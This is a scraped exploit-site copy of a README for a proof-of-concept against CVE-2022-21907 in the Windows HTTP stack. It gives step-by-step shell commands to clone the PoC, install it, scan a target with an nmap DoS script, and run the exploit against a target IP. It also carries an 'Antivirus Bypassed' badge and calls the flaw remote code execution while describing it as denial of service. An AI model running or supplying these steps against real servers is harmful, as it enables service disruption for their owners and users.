Share
## https://sploitus.com/exploit?id=640BECAE-3809-5438-AF3C-1D6BA52C8DDB
<h1 style="font-size:10vw" align="left">CVE-2022-21907 - HTTP Protocol Stack Remote Code Execution Vulnerability</h1>


<img src="https://img.shields.io/badge/CVSS:3.1%20Score%20-7.8 HIGH-red"> [![Python](https://img.shields.io/badge/Python-%E2%89%A5%203.11-blueviolet.svg)](https://www.python.org/) <img src="https://img.shields.io/badge/Antivirus%20Bypassed-%E2%89%A5%20Yes-blue">


******
โš ๏ธ *For educational and authorized security research purposes only*


## Original Exploit Authors
Very grateful to the original PoC author [NU11SECURITY](https://www.exploit-db.com/?author=10359) and [michelep](https://github.com/michelep)


## Description:
HTTP Protocol Stack Remote Code Execution Vulnerability. This vulnerability would cause a denial-of-service attack to a target system that has an IIS web server.


******
## Step Guides
1. Install git, then clone the PoC from the github repository:

    ```bash
   sudo apt install git -y
   git clone https://github.com/asepsaepdin/CVE-2022-21907.git
   ```

3. Install the requirements using pip3 command:

   ```bash
   sudo apt install python3-pip -y
   cd CVE-2022-21907
   pip3 install -r requirements.txt
   ```

4. Check the presence of vulnerability of target machine using command:

   ```bash
   nmap -p 80 --script dos_iis_2022_21907 10.10.10.1
   ```

5. Then, run the PoC scripts using command:

   ```bash
   python3 CVE-2022-21907.py -i 10.10.1.10
   ```

   > **Notes**: specify -i options with the target IP address 


******
## Credits
- https://nvd.nist.gov/vuln/detail/CVE-2022-21907#match-8257502
- https://www.exploit-db.com/exploits/51575
- https://github.com/mauricelambert/CVE-2022-21907
- https://github.com/michelep/CVE-2022-21907-Vulnerability-PoC


## Mitigations:
- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907

------